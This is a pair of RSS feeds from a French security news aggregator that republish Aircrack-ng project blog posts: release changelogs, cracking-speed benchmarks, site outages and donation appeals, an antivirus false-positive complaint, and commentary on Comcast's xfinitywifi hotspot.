<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Observatoire de la securite Internet</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>ASCII WEP key</title><description>2009-04-26 20:18:27 - Aircrackng : I often see people who cracked a WEP key and who wanted to convert it to ASCII. My question is: why do you want to convert it? Maybe because it is easier to remember? Mmmh, not always, especially if it's 13 random characters like this: $5@r6m2be_rEX. Maybe for network managers (command line/graphical, Linux/Windows)? No, they don't care if it's ASCII or hex. And an incomplete conversion would be unusable. And, btw, if it was convertible, aircrack-ng would have given you the ASCII version :)</description><link>http://www.secuobs.com/revue/news/88403.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88403.shtml</guid></item>
<item><title>Aircrack-ng.org new main page design</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - We are currently working on a new website, and more precisely on the entry of www.aircrack-ng.org. This is not meant to replace the wiki but it is meant to give a quicker access to the most used things on the main page of the wiki and a better overview of the important things. It will be installed next to the wiki and thus nothing will change for you (you won't have to change your bookmarks). What do you think about the new main page?</description><link>http://www.secuobs.com/revue/news/88402.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88402.shtml</guid></item>
<item><title>New release really soon: 1.0rc3</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - There will be a new release in a day or 2. It will fix a lot of bugs (including the compiling issue of rc2 on 64 bit) and add one new feature: creation of kismet (newcore) netxml files so that it can work with GISkismet. Some programs (wesside-ng, easside-ng, tkiptun-ng) were marked as unstable and you need to append the flag 'unstable=true' when running make and make install. Here is the current changelog: * airodump-ng: Added Active Scanning Simulation * airodump-ng: Added support for kismet-newcore netxml files (DTD v3.1.0) * airodump-ng: Changed file extensions for CSV (.csv instead of .txt) and for kismet CSV (.kismet.csv instead of .csv) * airodump-ng: Fixed WPA tag parsing and added QoS detection based on direction * airodump-ng: Added option to only disable capture file; all other files (CSV, kismet CSV, kismet netxml, GPS) will be created * aircrack-ng: Fixed -w with WEP * aircrack-ng: Fixed useless memory allocation * aircrack-ng: Fixed compilation with gcc 2.95 * aircrack-ng: Fixed compilation on 64 bit (SHA-SSE2) * aircrack-ng: Fixed errors when compiling on OS X 10.5.6 PPC * aircrack-ng: Added an option to write the key to a file * airolib-ng: Fixed a bug where database is created even if parameters are not correct * airmon-ng: Added wifibox to the list of network manager * airmon-ng: Updated iw download link (0.9.9) * airmon-ng and airdriver-ng: Move them in script/ directory * airmon-ng: Bypass interface checks when ps command returns an error. Needed for BusyBox (limited ps command) * airdriver-ng: Update legacy RT73 driver to use rt73-k2wrlz v3.0.2 * tkiptun-ng: Allow padded arp packets to the client * airserv-ng and osdep: Fixed compilation on FreeBSD 7.1 * easside-ng and wesside-ng: Fixing again "Error Wrote 39 out of 30" error message * manpages: Fixed manpages titles * Makefile: Only compile and install wesside-ng, easside-ng, buddy-ng and tkiptun-ng with "make unstable=true" * patches: Updated sqlite v3.6.11 patch for cygwin * patches: Added patch for aircrack-ng on MacOSX</description><link>http://www.secuobs.com/revue/news/88401.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88401.shtml</guid></item>
<item><title>Forum down</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - As you saw, the forum has been down since a few hours, around 6pm GMT+1. The reason is that the database size is really close to the allowed disk space and the hoster stopped it automatically. I moved it to another place where we have much more space and there are just a few things to do before it's back up: - DNS needs to be updated - a few glitches on the server have to be fixed - A script has to be written to redirect all requests from forum.tinyshell.be to the new URL so that any link to it will still work. The good news is that nothing was lost and it should be faster than before. Ah yeah, it should be back up tomorrow evening and the release of 1.0rc3 will be done the next day :)</description><link>http://www.secuobs.com/revue/news/88400.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88400.shtml</guid></item>
<item><title>Forum up</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - The forum is finally up and everything is working fine: * DNS updated * Redirection works fine: all your bookmarks and links in the forum with the old address should redirect to the new one automatically. I was surprised to see new posts announced on IRC that still has the old RSS feed address. Technically, the old URL rewrites the URL to point to the new location with the parameters and uses a 301 to do that * Links (URLs, RSS) are updated on the wiki * No more glitches on the server. However if it happens, don't hesitate to send a mail to tdotreppe@aircrack-ng.org to tell me with details. Last but not least, the 1.0rc3 release should be done tomorrow if everything goes well. I told Murphy to leave me alone at least for a few days :)</description><link>http://www.secuobs.com/revue/news/88399.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88399.shtml</guid></item>
<item><title>Aircrack-ng 1.0rc3 released</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - It is finally released :) Download links: * Sources * Windows binaries - You have to read the important information regarding windows. Here is a summary of the changes: * tkiptun-ng, easside-ng (and buddy-ng) and wesside-ng are not compiled by default, you have to append 'unstable=true' when compiling and installing * CSV file extension has changed and has now .csv as extension * Kismet CSV file extension is now .kismet.csv * Airodump-ng can generate kismet (newcore) NetXML files (.kismet.netxml) and thus should be compatible with GISkismet; however using GPSd currently causes corruption (pcap corruption); that will be fixed in the next release * Fixed compiling on 64 bit * There's a patch for OSX (intel). You must apply it or aircrack-ng will not work correctly (instructions can be found in INSTALLING file) * Added Active scanning simulation in airodump-ng * Various fixes. Here is the complete changelog: * airodump-ng: Added Active Scanning Simulation * airodump-ng: Added support for kismet-newcore netxml files (DTD v3.1.0) * airodump-ng: Changed file extensions for CSV (.csv instead of .txt) and for kismet CSV (.kismet.csv instead of .csv) * airodump-ng: Fixed WPA tag parsing and added QoS detection based on direction * airodump-ng: Added option to only disable capture file; all other files (CSV, kismet CSV, kismet netxml, GPS) will be created * aircrack-ng: Fixed -w with WEP * aircrack-ng: Fixed useless memory allocation * aircrack-ng: Fixed compilation with gcc 2.95 * aircrack-ng: Fixed compilation on 64 bit (SHA-SSE2) * aircrack-ng: Fixed errors when compiling on OS X 10.5.6 PPC * aircrack-ng: Added an option to write the key to a file * airolib-ng: Fixed a bug where database is created even if parameters are not correct * airmon-ng: Added wifibox to the list of network managers * airmon-ng: Updated iw download link (0.9.11) * airmon-ng and airdriver-ng: Move them in script/ directory * airmon-ng: Bypass interface checks when ps command returns an error. Needed for BusyBox (limited ps command) * airdriver-ng: Update legacy RT73 driver to use rt73-k2wrlz v3.0.2 * tkiptun-ng: Allow padded arp packets to the client * airserv-ng and osdep: Fixed compilation on FreeBSD 7.1 * easside-ng and wesside-ng: Fixing again "Error Wrote 39 out of 30" error message * manpages: Fixed manpages titles * Makefile: Only compile and install wesside-ng, easside-ng, buddy-ng and tkiptun-ng with "make unstable=true" * patches: Updated sqlite v3.6.11 patch for cygwin * patches: Added patch for aircrack-ng on MacOSX * scripts: Added a script to automatically patch and install SQLite in cygwin</description><link>http://www.secuobs.com/revue/news/88398.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88398.shtml</guid></item>
<item><title>Airodump-ng with native wireless driver on Windows</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - EDIT: This was an April Fool :) Although this is not a final version (a work in progress), here is a version of airodump-ng that works on windows with the native drivers of your wireless card. Here is a screenshot of the application. Download link: airodump-ng-win-native-drivers.zip. Nearly all drivers in windows XP are NDIS. So, to allow/enable monitor mode in the drivers, you have to install a special "driver". Because MS may not like it, I prefer to distribute it via bittorrent: native_rfmon_winxp.torrent. Note: It was tested on Windows XP and with an Intel Pro/Set Wireless 2200. And it requires .NET 2.0. Note 2: If your wireless card isn't listed, it means the adapter is disabled and you'll have to enable it and restart the application. Right click on "My Network Place" then select "Properties". In the list, right click on your wireless adapter and click on "Enable". In the final version, it will be fixed and will only list wireless interfaces. Edit: Here is the video (sorry for the quality, it's not easy to record the screen with a camera).</description><link>http://www.secuobs.com/revue/news/88397.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88397.shtml</guid></item>
<item><title>Workshop at Brucon 2009</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - I'll be giving a workshop at Brucon 2009 (18-19 September 2009). Abstract: During this workshop, I'll tackle different scenarios that could happen during an audit of WiFi networks (Open, WEP and WPA), including the use of CUDA and FPGA to accelerate cracking. Aircrack-ng is not only meant for auditing wireless networks, it can also be used for site surveys and different tools based on it will be presented: - Airgraph-ng, graphing wireless networks and its integration in Maltego - GISKismet, representing wireless networks in Google earth - And more. There will also be a contest. More details will follow.</description><link>http://www.secuobs.com/revue/news/88396.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88396.shtml</guid></item>
<item><title>Website down</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - Unfortunately, the website is down due to an error in traffic calculation. We usually use 30-40Gbytes per day and we have 1200Gbytes of traffic per month, so enough for each month. But the 14 and 15 April, their system say we use 688 and 884Gb (= more than 10Mbytes/sec for 24 hours) of traffic so 20-30 times what we usually use thus exceeding the allowed traffic per month. I'm contacting them to try to fix it as soon as possible. Edit: Here is an update: http://aircrack-ng.blogspot.com/2009/04/paying-bill.html</description><link>http://www.secuobs.com/revue/news/88395.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88395.shtml</guid></item>
<item><title>Paying the bill</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - I finally found who is the responsible (or at least the IP address) of the author of this DoS (if generating 1.5Tb of traffic in 2 days and making the monthly traffic exceed thus making the website down is not a DoS, then what is it?) and you can be sure that this guy will have to pay the traffic, sooner or later. Administrative stuff is taking too long so I think it will be easier to pay the bill now to have the website back up. Aircrack-ng cost me around 60 euro per month + domain names that have to be renewed each year, wireless cards, traffic, ... and although we have around 30K unique visitors each day, unfortunately donations are quite low (the total for last year was around 80 euro). The reason why I'm writing this post is to ask for donations to pay that bill (around 130 euro). So, any donation to tdotreppe@aircrack-ng.org (paypal) is really welcome.</description><link>http://www.secuobs.com/revue/news/88394.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88394.shtml</guid></item>
<item><title>Thanks a lot</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - Good news, the website is now up thanks to all donations. Even if I really like to work on aircrack-ng, it is really great to see a lot of people helping us, and I really want to thank them a lot ;) The other good news is that we now have enough to pay hosting until July (if this kind of DoS doesn't happen again) but please continue, that would be wonderful if donations could cover hosting costs every month. Last but not least, I promise that I'll try to make that guy pay the traffic he generated.</description><link>http://www.secuobs.com/revue/news/88393.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88393.shtml</guid></item>
<item><title>Finding the author of the DoS</title><description>Secuobs.com : 2009-04-26 20:18:27 - Aircrackng - As I said, I know the IP address of the author of the DoS on our website and since he's located in Europe (Spain), it shouldn't be really hard to solve the case with the Computer Crime Unit. However, I would like to try to solve it with him first. I just want him to contact me (tdotreppe@aircrack-ng.org) within 2 weeks to reimburse the bandwidth he generated and explain why he did it and I promise there will be no consequence, no complaint registered.</description><link>http://www.secuobs.com/revue/news/88392.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/88392.shtml</guid></item>
</channel>
</rss>
 
<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Observatoire de la securite Internet</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
 <item><title>Aircrack-ng compilation matrix</title><description>2016-02-16 04:42:50 - Aircrack ng : I tried to compile Aircrack-ng on a 'few' systems to see how it works and I was quite surprised by the amount of systems it can be compiled on, and most of the time, it can be compiled with both gcc and clang. Here is the status for the current development code (r2846). I will update this matrix and add more details from time to time.
On x86 (32/64 bit):
OS | GCC | Clang/LLVM
Linux | Yes | Yes
OpenWrt | Yes | Untested
Cygwin 32 bit | Yes | Yes
Cygwin 64 bit | Yes | No
OSX (Travis CI) | Yes | Yes
FreeBSD | No | Yes
OpenBSD | Yes | Yes
NetBSD | Untested | Untested
DragonFlyBSD | Yes | No package
Solaris | Yes | Yes
Other CPUs (Linux):
CPU | GCC | Clang/LLVM
ARM 32 bit | Yes | Yes
ARM 64 bit | Yes | Untested
MIPS | Yes | No</description><link>http://www.secuobs.com/revue/news/598384.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/598384.shtml</guid></item>
<item><title>Aircrack-ng 1.2 Release Candidate 4</title><description>Secuobs.com : 2016-02-15 03:39:17 - Aircrack ng - Fourth release candidate. There will be another one, some small bugs still need to be fixed but it should happen fairly soon. On top of a big speed increase (up to 175% increase) that also fixes compilation on Cygwin 64 bit, it includes a ton of fixes and improvements on Linux, BSD, Solaris and Cygwin on x86 and Linux on ARM and MIPS. Changelog: * Airodump-ng: Increase console window size * Aircrack-ng: Added time remaining and percentage done when doing WPA cracking with a dictionary (file) * Aircrack-ng: Make benchmark last 15 seconds for a more accurate value * Aircrack-ng: Fixed compilation on Cygwin 64 and drastically improve cracking speed for all CPUs (up to 175% performance) * Airmon-ng: Improved chipset detection on FreeBSD * Airmon-ng: Display chipset for some Broadcom SDIO * Airbase-ng: Fixed broadcasting 'default' * General: Updated and cleanup TravisCI file to test compilation and testing on OSX * General: Fixed reading large files on Cygwin * General: Fixed a bunch of compilation warnings with gcc and clang * General: Fixed compilation on Solaris, OpenBSD, DragonFlyBSD 4.4, NetBSD, OSX * General: Fixed compilation on ARM and MIPS * General: Improved compatibility on FreeBSD and Cygwin (RAM and CPU detection) * General: Fixed gcc segfault on cygwin * General: Memory cleanups, fixed memory leaks and fix other issues reported by Valgrind * Testing: Fixes on various OSes * INSTALLING: Updated installation instructions for different OS * TravisCI: Improved file</description><link>http://www.secuobs.com/revue/news/598275.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/598275.shtml</guid></item>
<item><title>Cracking speed improvements</title><description>Secuobs.com : 2015-12-30 10:10:59 - Aircrack ng - Almost 8 years ago, we got pretty big improvement with SSE2 code to crack WPA, a nice upgrade from MMX. I recently posted a bug bounty to fix the compilation of Aircrack-ng on Cygwin 64 bit. It's been working fine on Linux 64 bit but for some reason, Cygwin didn't like when compiling on 64 bit. We couldn't have tested it back then since Cygwin 64 bit didn't exist at the time. darkfires took up the challenge to fix the compilation on Cygwin 64 bit. After that, he helped fix a bunch of memory leaks and other issues as well as improving cracking speed quite a bit, which is the reason of this post. The task was pretty daunting and a lot of testing was needed to make sure it works on the different CPU architectures (x86 32 and 64 bit, various ARM) and different OSes (Cygwin, Linux, BSD, Solaris, OSX). On top of the usual 'fixing something on one, breaking on the other', here are three examples on how complicated it was: * Different CPU support different features and instructions set and detecting them wasn't an easy task. For example, on Raspberry Pi (v1), gcc supports 'neon' and we can compile aircrack-ng with them but the CPU itself doesn't support them which means aircrack-ng crashes and it has to be disabled. On the Beaglebone, the CPU support neon instructions. * gcc can compile with AVX2 instructions on x86. However, if the CPU doesn't support it, aircrack-ng will crash with a nice error: 'Illegal instruction'. * Some code that works to get CPU features (such as MMX, SSE, AVX) works on some CPU and doesn't on others. There is no way to explain in details how complicated it was to make it work on all those different combinations of CPU and OSes. darkfires has spent countless hours making all of this work. To give you an idea how much work has been done, the patch was 375Kb and 11K lines long. On top of it, the Aircrack-ng CPU detection code has been rewritten on x86 to give more details. Here is what 'aircrack-ng -u' now looks like:
Vendor = Intel
Model = Intel(R) Core(TM) i7-2630QM CPU @ 2.00GHz
Features = MMX,SSE,SSE2,SSE3,SSSE3,SSE4.1,SSE4.2,AVX
Hyper-Threading = Yes
Logical CPUs = 8
CPU cores = 4
SIMD size = 4 (128 bit)
Last but not least, here are the numbers:
CPU | 1.2rc3 | r2800 | Increase
Celeron M 1.4Ghz | 138 k/s | 152 k/s | 10%
i7-2630QM | 3000 k/s | 4000 k/s | 33%
E3-1231 v3 | 4900 k/s | 13100 k/s | 167%
i5-4590 | 4700 k/s | 11600 k/s | 146%
i7-6700K | 6200 k/s | 17100 k/s | 175%
It's still pretty far from GPU cracking speeds but there are pretty significant gains thanks to AVX. The second version provides the most gains as you can see on the numbers above. Bonus thing: if you are a package maintainer, you can compile aircrack-ng with different improvements. Simply edit the common.cfg and put MULTIBIN true and when running make will compile 3 different versions: the original, SSE and SIMD. We have tested it quite a bit on different CPU and OSes but please test (simply get the latest revision from our subversion repository) a lot and report back to us. Let us know how it works for you, what kind of improvements you're getting and we especially want to hear if you have bugs. If you have a recent AMD CPU, we want to hear from you. The plan is to make another release candidate in about 2 weeks.</description><link>http://www.secuobs.com/revue/news/594463.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/594463.shtml</guid></item>
<item><title>Aircrack-ng 1.2 Release Candidate 3</title><description>Secuobs.com : 2015-11-22 00:12:20 - Aircrack ng - Third release candidate and hopefully this should be the last one. It contains a ton of bug fixes, code cleanup, improvements and compilation fixes everywhere. Some features were added: AppArmor profiles, better FreeBSD support, including an airmon-ng for FreeBSD. Changelog: * Airodump-ng: Prevent sending signal to init which caused the system to reboot/shutdown * Airbase-ng: Allow to use a user-specified ANonce instead of a randomized one when doing the 4-way handshake * Aircrack-ng: Fixed compilation warnings * Aircrack-ng: Removed redundant NULL check and fixed typo in another one * Aircrack-ng: Workaround for segfault when compiling aircrack-ng with clang and gcrypt and running a check * Airmon-ng: Created version for FreeBSD * Airmon-ng: Prevent passing invalid values as channel * Airmon-ng: Handle udev renaming interfaces * Airmon-ng: Better handling of rfkill * Airmon-ng: Updated OUI URL * Airmon-ng: Fix VM detection * Airmon-ng: Make lsusb optional if there doesn't seem to be a usb bus. Improve pci detection slightly * Airmon-ng: Various cleanup and fixes (including wording and typos) * Airmon-ng: Display iw errors * Airmon-ng: Improved handling of non-monitor interfaces * Airmon-ng: Fixed error when running 'check kill' * Airdrop-ng: Display error instead of stack trace * Airmon-ng: Fixed bashism * Airdecap-ng: Allow specifying output file names * Airtun-ng: Added missing parameter to help screen * Besside-ng-crawler: Removed reference to darkircop.org (non-existent subdomain) * Airgraph-ng: Display error when no graph type is specified * Airgraph-ng: Fixed make install * Manpages: Fixed, updated and improved airodump-ng, airmon-ng, aircrack-ng, airbase-ng and aireplay-ng manpages * Aircrack-ng GUI: Fixes issues with wordlists selection * OSdep: Add missing RADIOTAP_SUPPORT_OVERRIDES check * OSdep: Fix possible infinite loop * OSdep: Use a default MTU of 1500 (Linux only) * OSdep: Fixed compilation on OSX * AppArmor: Improved and added profiles * General: Fixed warnings reported by clang * General: Updated TravisCI configuration file * General: Fixed typos in various tools * General: Fixed clang warning about 'gcry_thread_cbs()' being deprecated with gcrypt 1.6.0 * General: Fixed compilation on cygwin due to undefined reference to GUID_DEVCLASS_NET * General: Fixed compilation with musl libc * General: Improved testing and added test cases (make check) * General: Improved mutexes handling in various tools * General: Fixed memory leaks, use after free, null termination and return values in various tools and OSdep * General: Fixed compilation on FreeBSD * General: Various fixes and improvements to README (wording, compilation, etc) * General: Updated copyrights in help screen</description><link>http://www.secuobs.com/revue/news/590779.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/590779.shtml</guid></item>
<item><title>Aircrack-ng 1.2 Release Candidate 2</title><description>Secuobs.com : 2015-04-10 15:46:50 - Aircrack ng - Here is the second release candidate. Along with a LOT of fixes, it improves the support for the Airodump-ng scan visualizer. Airmon-zc is mature and is now renamed to Airmon-ng. Also, Airtun-ng is now able to encrypt and decrypt WPA on top of WEP. Another big change is recent version of GPSd now work very well with Airodump-ng. Changelog: * Airtun-ng: Adds WPA CCMP and TKIP decryption and CCMP encryption * Compilation: Added support for DUMA * Makefile: Renamed 'unstable' to 'experimental' * Airodump-ng: Fixed XML sanitizing * Airmon-ng: Airmon-zc is now stable enough to replace airmon-ng * Manpages: Removed airdriver-ng manpage and references to it (forgot to do it before the previous release) * Manpages: Updated 'see also' references in all manpages * PCRE: Added it in various places and docs * WZCook: Fixed processing values stored in register * Updated a few headers files (if_llc, ieee80211, ethernet and if_arp) * Travis CI: updated make parameter and add testing with pcre * Compilation: de-hardcode -lpcap to allow specifying pcap libraries * Makefile: Fixed installing/uninstalling Airdrop-ng documentation files * Makefile: Fixed uninstalling ext_scripts * Airodump-ng: Added new paths (and removed one) for OUI files and simplified logic to find the OUI file * Aircrack-ng: Fixed ignoring -p when specified after -S * Airmon-ng: fixes for openwrt busybox ps/grep issues which do not seem present in other versions of busybox * Airmon-ng: fix vm detection * Airserv-ng: Fixed channel setting (and assert call) * Airodump-ng: Fixes to NetXML (unassociated clients missing and various other small bugs) and update the code to match current NetXML output * Airodump-ng: Removed requirement for 2 packets before AP is written to output (text) files * Airodump-ng: Fixed formatting of ESSID and display of WPA/WPA2 (as well as a bunch of other small fixes) in CSV file * Airodump-ng: Fixed GPSd * Airodump-ng: Allow to specify write interval for CSV, kismet CSV and NetXML files * Airserv-ng: Fixed wrong station data displayed in Airodump-ng * General: Fixed 64 bit promotion issues * General: Fixed a bunch of uninitialized values and non-zeroed structures (upon allocating them) * General: Added Stack protection * Various other small fixes and improvements</description><link>http://www.secuobs.com/revue/news/566863.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/566863.shtml</guid></item>
<item><title>Aircrack-ng 1.2 Release candidate 1</title><description>Secuobs.com : 2014-11-01 01:14:27 - Aircrack ng - Here is the first release candidate. I was wrong about saying there would be a fourth beta in the post of the previous release. There is exactly 7 months after the last beta. There will be most likely another one then the final release in the next few months. Updating is highly recommended as this contains a lot of bug fixes and improvements as well as security fixes. More details can be found in the blog. Changelog: * Airodump-ng should be able to parse the canonical oui file * Airodump-ng: Fixed GPS stack overflow * Airodump-ng: Fixed stopping cleanly with Ctrl-C * Airmon-zc: better handling for when modules are not available (incomplete) * Airmon-zc: users can now start the monitor interface again to change channels * Airmon-zc: update to use ip instead of ifconfig if available * Airmon-zc: better handling of devices without pci bus * Aireplay-ng: Fixed tcp_test stack overflow * OSdep: Fixed libnl detection. Also avoid detection on non Linux systems * OSdep: Fixed segmentation fault that happens with a malicious server * Besside-ng: Add regular expression matching for the SSID * Buddy-ng: Fixed segmentation fault * Makefile: Fixed 'commands commence before first target' error when building Aircrack-ng * Fixed segfault when changing the optimization when compiling with gcc thanks to Ramiro Polla * Removed airdriver-ng (outdated and not meant for today's kernels) * Added .gitignore file * Fixed build issues on other compilers by using stdint.h types * Updating installation file and added pkg-config as a requirement * Various small fixes and improvements</description><link>http://www.secuobs.com/revue/news/543416.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/543416.shtml</guid></item>
<item><title>Comcast xfinitywifi and hidden wifi network</title><description>Secuobs.com : 2014-06-11 05:04:48 - Aircrack ng - Recently, on twitter, I talked about Comcast and their xfinitywifi network. Here is the full story. If you have Comcast and a recent modem from them such as one of those, it creates by default a wireless network called xfinitywifi (if it doesn't now, it will do it soon). So that other people with Comcast can login to it and have Internet access when they are traveling. It's a pretty good idea since it does not use any of your bandwidth (based on what they say and Slashdot had a story today from the Houston Chronicle) but it could slow down your wireless network since it is on the same channel. However, I really don't like the way they implemented it: it is enabled by default and you can only disable when logging on your account online, there is not a single mention of it in the modem configuration. It's also a bad idea because you can easily fake it to steal credentials (it's an Open network, no encryption). Unfortunately, I had to spend quite a lot of time with their tech customer service to figure out and get it disabled (their first attempt to disable it failed). And they will try to convince you to leave it. I knew they have access to the cable modem and they can reset/upgrade the firmware. What's really worrying is that they can access all the settings of the modem, including the wireless settings and they could tell me what my WiFi settings were. They might also be able to access your network. Moving on. Another issue I mentioned to their tech was that there was another wireless network along xfinitywifi and my personal network. A hidden network with the same security settings as my personal network (or it's just a coincidence I use the same settings as them). The MAC address is also very similar to the one of your modem. What changes is the first byte. As of now (last time I spoke to them was 2 or 3 weeks ago at least), this hidden network is still there and I have absolutely no idea what that network is. So, I'll disable the wireless on the modem and have another AP between the modem and my network. Here is a picture of the network (let me know if you'd like a PCAP). Does anybody know what that hidden wireless network is for? Comcast hasn't responded yet to that question on twitter.</description><link>http://www.secuobs.com/revue/news/518144.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/518144.shtml</guid></item>
<item><title>Custom trac/svn or GitHub (or other alternative)</title><description>Secuobs.com : 2014-06-09 00:13:07 - Aircrack ng - Recently, I had a small discussion about moving to GitHub (or another similar solution) on IRC. The subject has come up several times (and I thought several times about it) and I'd like to have more opinions about it. I'm really tempted to move it since it might decrease cost a little bit and most importantly, it will decrease the amount of maintenance I have to do. However, I have some concerns and I'm open to new ideas. I like GitHub since it has most of the features of (a base) trac (and I don't need more than that). User management is built-in, as well as anti-spam. There is a big community around it and we can do continuous integration (using Travis CI). And I don't have to spend time cleaning up the spam, updating the server (and making sure it's secure). I guess GitHub have security measures. Here is what I don't like with GitHub: 1. You don't have control of your code anymore. 2. One way thing: you can import trac (tickets and stuff) to GitHub but I never heard of tools to back that up. 3. You depend on them: if they're down, you'll have to wait for their stuff to come back up. If they get hacked, you might be in trouble. They can close your project. If you guys remember WhatsApp, a few days before it was bought by Facebook, GitHub received DMCA letters and had to close a bunch of projects that were related to WhatsApp (or API library). 4. You need an account to create a bug report. However, the cons can be somehow alleviated: 1. Hosting my own git repository and syncing to GitHub (as well as other GitHub alternatives). 2. If there is no tool to back up GitHub, I might develop one (and open source it) or pay somebody to create one. 3. Using multiple services. We could have GitHub as the main location and using other services as back-up (read-only). If GitHub gets down, we can switch any other to read-write. However, we'll need a software to do the sync (and it also depends on the back-up program in the previous point). 4. If they don't have an account: Accept bug reports by email and/or have people post in the forum (you don't need an account to post) and I take care of adding them to GitHub. So, here are my questions: 1. What is your opinion about using GitHub (and git) for Aircrack-ng instead of trac/svn? 2. What are the alternative to GitHub (free, hosted)? If you've used it, please give me your opinion about it. I'm also willing to pay a few dollars a month if there is a serious one. 3. What are the installable (to your own server) alternatives to GitHub? It's better if it's free/open source but I don't mind paying if the solution is good. Here is what I found (and heard about): GitLab (to install, as backup, using gitlab-mirrors), BitBucket, Gitorious, Kiln. However, I need more feedback about them. As I get feedback, I'll update the post.</description><link>http://www.secuobs.com/revue/news/517729.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/517729.shtml</guid></item>
<item><title>Anti-virus issues and open letter to Anti-virus</title><description>Secuobs.com : 2014-06-09 00:13:07 - Aircrack ng - Anti-viruses have a bright side and a dark side. Well, antiviruses are like babysitters: they prevent dangerous things from happening to your computer. In a certain light, it's a good thing, but when you grow up (in this case, know how to use computers safely and want to use security tools), that babysitter becomes more of an annoyance. What I mean is that most security tools are flagged by antiviruses and Aircrack-ng isn't an exception. Sometimes, they just flag it as 'hacktool' or 'not-a-virus' but a few of them have weird-looking names and googling them doesn't even give you an answer of what it means. I had to deal with a lot of stuff because of that: * Emails from people telling me their antivirus detected aircrack-ng as a virus and I had to tell them it's perfectly safe and their antivirus is wrong * Yahoo, who has (or had) a safe page system using McAfee. It was telling Aircrack-ng website wasn't safe despite all messages saying it's perfectly safe * VIPR anti-virus, who was removing links to Aircrack-ng.org because they thought it wasn't safe * And a few other things I don't even remember. Here is one I just found in the forum. It hasn't been a problem until now because my hosting provider uses a service from C-Sirt.org to do online scanning of files to make sure there's no virus. In most cases, they are right but there is always an exception. The problem is that they think their system is perfect, as you can see when they talk about false positives: [IMAGE] At first, I was surprised and took their incident seriously. I started checking the MD5 and SHA1 of the file (which haven't changed) and submitted files to virustotal.com. That's where I saw why they think Aircrack-ng is a virus. As you can see, some of them give a name that will make you freak out (and using Google to find out what that means gives you NOTHING) but most of them don't detect it or clearly see
it as Aircrack-ng. I emailed the guy behind C-Sirt.org. Unfortunately, his English is more than approximate and, if I understand correctly what he tells me, I should simply contact all anti-viruses and ask them to remove Aircrack-ng from their definitions so that his algorithm won't flag it as a virus anymore. Well, I would be more than happy to do so but my experience with first line customer service is not successful so I doubt it will work out. Back to my provider. Even though I've been a customer for more than 6 years, they blindly trust C-Sirt.org and wrongfully shut down one of my servers where they thought the file was (and I'm still having issues getting it back up) and threatened to shut down my hosting where I told them where the file is because of a mistake in C-Sirt (due to antivirus definitions). I tried to convince them without any success and I'll gladly show you the emails if you guys want (as well as the single email I got from C-Sirt.org). So, anti-virus vendors, please be smarter nannies. I'm ok with you flagging viruses, but flagging security tools doesn't make sense and hurts us. Please remove Aircrack-ng and other security tools from your definitions. In the meantime, I'll just repack the file and add a password so you won't be able to scan it and it won't be wrongfully flagged. And if you're not planning to take it off your definitions, I've got a request to add another well-known security tool that's using Aircrack-ng: Core Impact. They even submitted a new attack for Aircrack-ng, which gives you a good reason (and a proof that it's not a virus) to take it off your definitions.</description><link>http://www.secuobs.com/revue/news/517728.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/517728.shtml</guid></item>
<item><title>Aircrack-ng 1.2 Beta 3 release</title><description>Secuobs.com : 2014-04-01 07:28:57 - Aircrack ng - And a third beta. I can guarantee there will be at least a fourth one before the final 1.2 release. Changelog: * Finally properly fixed the buffer overflow * Fixed channel parsing (e.g. 108, 125) and updated radiotap parser * Various other small fixes</description><link>http://www.secuobs.com/revue/news/505809.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/505809.shtml</guid></item>
